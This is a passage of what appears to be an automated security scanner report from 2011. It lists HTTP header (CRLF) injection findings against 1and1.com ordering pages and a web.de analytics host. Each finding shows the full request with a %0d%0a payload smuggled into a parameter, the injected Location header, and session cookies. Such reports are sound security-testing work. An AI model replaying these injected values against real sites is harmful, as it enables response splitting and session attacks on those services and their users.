Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:22:58 GMT
Server: Apache
Location: http://redirect.1and1.com/?origin.site=PU.WH.US&origin.sid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&origin.page=Hosting&target.site=PU.WH.US&origin.ac=OM.US.USa02K18619H7072a&global.ucuoId=PUAC:default.WH.US-20110320183706-CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&site=PU.WH.US&linkOrigin=a5802
86591ee57c3
&linkId=hd.log.eue&__frame=_top
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=Gdms7Pj81Xl5eWGthaC5mYC0fKWJVTydVSEIqLisrKigqKCUlKCchJCgbHRwbGFRCbmNlcystKFgxW2owIyQgHyQgHiEfMDgvLjdvcDYrMmJrMSQlISAlIh8iHSA4MTI=; Expires=Fri, 07-Apr-2079 21:37:05 GMT; Path=/
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8


3.8. http://order.1and1.com/xml/order/Jumpto [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Jumpto

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload b9161%0d%0a0390bad3044 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkId=hd.log.eue&site=PU.WH.US&origin.page=Hosting&linkOrigin=Hosting&linkId=hd.log.eue&b9161%0d%0a0390bad3044=1 HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:22:58 GMT
Server: Apache
Location: http://redirect.1and1.com/?origin.site=PU.WH.US&origin.sid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&origin.page=Hosting&target.site=PU.WH.US&origin.ac=OM.US.USa02K18619H7072a&global.ucuoId=PUAC:default.WH.US-20110320183706-CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&site=PU.WH.US&linkOrigin=Hosting&linkId=hd.log.eue&__frame=_top&b9161
0390bad3044
=1
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=vZ1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; Expires=Fri, 07-Apr-2079 21:37:05 GMT; Path=/
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8


3.9. http://order.1and1.com/xml/order/Jumpto [origin.page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Jumpto

Issue detail

The value of the origin.page request parameter is copied into the Location response header. The payload 2e03b%0d%0ad348ca74978 was submitted in the origin.page parameter. This caused a response containing an injected HTTP header.

Request

GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkId=hd.log.eue&site=PU.WH.US&origin.page=2e03b%0d%0ad348ca74978&linkOrigin=Hosting&linkId=hd.log.eue HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:22:58 GMT
Server: Apache
Location: http://redirect.1and1.com/?origin.site=PU.WH.US&origin.sid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&origin.page=2e03b
d348ca74978
&target.site=PU.WH.US&origin.ac=OM.US.USa02K18619H7072a&global.ucuoId=PUAC:default.WH.US-20110320183706-CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&site=PU.WH.US&linkOrigin=Hosting&linkId=hd.log.eue&__frame=_top
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=pbWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=; Expires=Fri, 07-Apr-2079 21:37:05 GMT; Path=/
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8


3.10. http://order.1and1.com/xml/order/Jumpto [page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Jumpto

Issue detail

The value of the page request parameter is copied into the Location response header. The payload d57be%0d%0aa073224f42f was submitted in the page parameter. This caused a response containing an injected HTTP header.

Request

GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkId=ngh&site=PU.NGH.US&origin.page=Hosting&page=d57be%0d%0aa073224f42f&linkOrigin=Hosting&linkId=ngh HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:23:04 GMT
Server: Apache
Location: http://redirect.1and1.com/?origin.site=PU.WH.US&origin.sid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&origin.page=Hosting&target.site=PU.NGH.US&target.page=d57be
a073224f42f
&origin.ac=OM.US.USa02K18619H7072a&global.ucuoId=PUAC:default.WH.US-20110320183706-CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&site=PU.NGH.US&linkOrigin=Hosting&linkId=ngh&__frame=_top
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=ra2AwMzQqU1NTTWBWdDpybDkrNW5hWzNKPTcfIyAgHx0fHRoxNDMtMDQnKSgnJEk3Y1haaCAiHU0mUHY8LzAsKzAsKi0rJS0kIyxkZSsgJ1dgPTAxLSwxLisuKSwtJic=; Expires=Fri, 07-Apr-2079 21:37:11 GMT; Path=/
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8


3.11. http://order.1and1.com/xml/order/Jumpto [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Jumpto

Issue detail

The value of the site request parameter is copied into the Location response header. The payload 6bf4e%0d%0a357848c4060 was submitted in the site parameter. This caused a response containing an injected HTTP header.

Request

GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkId=hd.log.eue&site=6bf4e%0d%0a357848c4060&origin.page=Hosting&linkOrigin=Hosting&linkId=hd.log.eue HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:22:57 GMT
Server: Apache
Location: http://redirect.1and1.com/?origin.site=PU.WH.US&origin.sid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&origin.page=Hosting&target.site=6bf4e
357848c4060
&origin.ac=OM.US.USa02K18619H7072a&global.ucuoId=PUAC:default.WH.US-20110320183706-CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&site=6bf4e
357848c4060&linkOrigin=Hosting&linkId=hd.log.eue&__frame=_top
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=wZlsrLi8lTmVlX3JobzVtZzQmMGlcVi5FODIaHhsbMS8xLywsLy4oKy8iJCMiH0QyXlNVYxs0L184YnE3KisnJisnJSgmICgfHidfYD0yOWlyOCssKCcsKSYpJCcoISI=; Expires=Fri, 07-Apr-2079 21:37:04 GMT; Path=/
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8


3.12. http://order.1and1.com/xml/order/Jumpto [sourcearea parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Jumpto

Issue detail

The value of the sourcearea request parameter is copied into the Location response header. The payload 29bf0%0d%0ad43926d593f was submitted in the sourcearea parameter. This caused a response containing an injected HTTP header.

Request

GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&origin.page=Hosting&linkId=weiter&site=PU.NGH.US&page=switch&sourcearea=29bf0%0d%0ad43926d593f HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:23:11 GMT
Server: Apache
Location: http://redirect.1and1.com/?origin.site=PU.WH.US&origin.sid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&origin.page=Hosting&target.site=PU.NGH.US&target.page=switch&origin.ac=OM.US.USa02K18619H7072a&global.ucuoId=PUAC:default.WH.US-20110320183706-CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&site=PU.NGH.US&linkId=weiter&__frame=_top&sourcearea=29bf0
d43926d593f

Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=uaF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigdO2t0Oi0uKikuKygrJikqIyQ=; Expires=Fri, 07-Apr-2079 21:37:18 GMT; Path=/
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8


3.13. http://order.1and1.com/xml/order/domaincheck [__lf parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/domaincheck

Issue detail

The value of the __lf request parameter is copied into the Location response header. The payload ab024%0d%0acfe55b3b16 was submitted in the __lf parameter. This caused a response containing an injected HTTP header.

Request

POST /xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame= HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642657924&__frame=_top
Cache-Control: max-age=0
Origin: http://order.1and1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=domaincheck; ucuo=20110320183705-002.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; UT=YZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyQnIiUmHyA=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:10:AAABLtRYUG7moGPNuumv6jupqX3xwRRp:1300642680942; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10
Content-Length: 161

__lf=ab024%0d%0acfe55b3b16&__sendingdata=1&__SBMT%3Ad1e1995d1%3A=&__SYNT%3Ad1e1995d1%3Anodomain.clicked=true&__SYNT%3Ad1e1995d1%3A__CMD%5Bdomaincheck%5D%3ASELWRP=nodomain

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:48:36 GMT
Server: Apache
Location: http://order.1and1.com:80/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300646916771&__frame=&__lf=ab024
cfe55b3b16

Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=FYGw8P0A2X19fWWxiaS9nYS4gKmNWUCg/SUMrLywsKykrKSYmKSgiJSkcHh0cGT5Db2RmdCwuKVkyXGsxJCUhICUhHyIgGjkwLzhwcTcsM2NsMiUmIiEmIyAjHiEiMjM=; Expires=Fri, 07-Apr-2079 22:02:43 GMT; Path=/
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 0


3.14. http://order.1and1.com/xml/order/domaincheck [jsessionid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/domaincheck

Issue detail

The value of the jsessionid request parameter is copied into the Location response header. The payload e4fdd%0d%0a682e1dc8167 was submitted in the jsessionid parameter. This caused a response containing an injected HTTP header.

Request

POST /xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=e4fdd%0d%0a682e1dc8167 HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642657924&__frame=_top
Cache-Control: max-age=0
Origin: http://order.1and1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=domaincheck; ucuo=20110320183705-002.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; UT=YZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyQnIiUmHyA=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:10:AAABLtRYUG7moGPNuumv6jupqX3xwRRp:1300642680942; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10
Content-Length: 161

__lf=Order-Tariff&__sendingdata=1&__SBMT%3Ad1e1995d1%3A=&__SYNT%3Ad1e1995d1%3Anodomain.clicked=true&__SYNT%3Ad1e1995d1%3A__CMD%5Bdomaincheck%5D%3ASELWRP=nodomain

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:48:35 GMT
Server: Apache
Location: http://order.1and1.com:80/xml/order/eshopupselling;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300646915507&__frame=e4fdd
682e1dc8167
&__lf=Order-Tariff
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=mcGU1ODkvWFhYUmVbYihgWicwOnNmYDhPQjwkKCUlJCIkIh8fIiEbHjksLi0sKU48aF1fbSUnIlIrVWQqHR4aMDUxLzIwKjIpKDFpajAlLFxlKx4fGxo2MzAzLjEyKyw=; Expires=Fri, 07-Apr-2079 22:02:42 GMT; Path=/
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 0


3.15. http://order.1and1.com/xml/order/tariffselect [__lf parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/tariffselect

Issue detail

The value of the __lf request parameter is copied into the Location response header. The payload 70f82%0d%0ae7e5d5b7eec was submitted in the __lf parameter. This caused a response containing an injected HTTP header.

Request

GET /xml/order/tariffselect;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=70f82%0d%0ae7e5d5b7eec&__sendingdata=1&packageselection=Hosting&cart.action=add-bundle&cart.bundle=tariff-beginner-package-bundle HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Home; ucuo=20110320183705-002.TCpfix141a; lastpage=Hosting; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; UT=0b2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1Mi8yLTAxKis=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:7:AAABLtRYEq4lKh04bfPXut2iW59Fdwxl:1300642665134; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:39:48 GMT
Server: Apache
Location: http://order.1and1.com:80/xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300646388883&__frame=_top&__lf=70f82
e7e5d5b7eec

Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=mcGU1ODkvWFhYUmVbYihgWicwOnNmYDhPQjwkKCUlJCIkIh8fIiEbHjksLi0sKU48aF1fbSUnIlIrVWQqHR4aMDUxLzIwKjIpKDFpajAlLFxlKx4fGxo2MzAzLjEyKyw=; Expires=Fri, 07-Apr-2079 21:53:55 GMT; Path=/
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 0


3.16. http://order.1and1.com/xml/order/tariffselect [jsessionid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/tariffselect

Issue detail

The value of the jsessionid request parameter is copied into the Location response header. The payload 1fd04%0d%0a0cd46c6d446 was submitted in the jsessionid parameter. This caused a response containing an injected HTTP header.

Request

GET /xml/order/tariffselect;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top1fd04%0d%0a0cd46c6d446&__sendingdata=1&packageselection=Hosting&cart.action=add-bundle&cart.bundle=tariff-home-package-bundle HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:39:12 GMT
Server: Apache
Location: http://order.1and1.com:80/xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300646352788&__frame=_top1fd04
0cd46c6d446

Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=bZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyQnIiUmHyA=; Expires=Fri, 07-Apr-2079 21:53:19 GMT; Path=/
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8


3.17. http://wa.ui-portal.de/webde/webde-s/s [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wa.ui-portal.de
Path:   /webde/webde-s/s

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 41e09%0d%0af4b2c7153f2 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /webde/webde-s/41e09%0d%0af4b2c7153f2?homepage.startseite.pi.home&ns__t=1300646035235&hp_size=1024&hp_country=de&hp_lang=de&hp_portal=webde&hp_userlevel=none&ns_type=view&hp_s_res=1920x1200&hp_s_view=1096x916&ns_c=utf-8&hp_tp=2284&hp_ab=0&ns_jspageurl=http%3a//www.web.de/&ns_ti=web.de+-+e-mail+-+suche+-+dsl+-+de-mail+-+shopping+-+entertainment&ns_referrer=http%3a//www.united-internet.de/deref%3flink%3dhttp%253a%252f%252fwww.web.de%26__sign%3da07b9045963854a3552981589724d9be%26__ts%3d1300644360211 HTTP/1.1
Host: wa.ui-portal.de
Proxy-Connection: keep-alive
Referer: http://www.web.de/
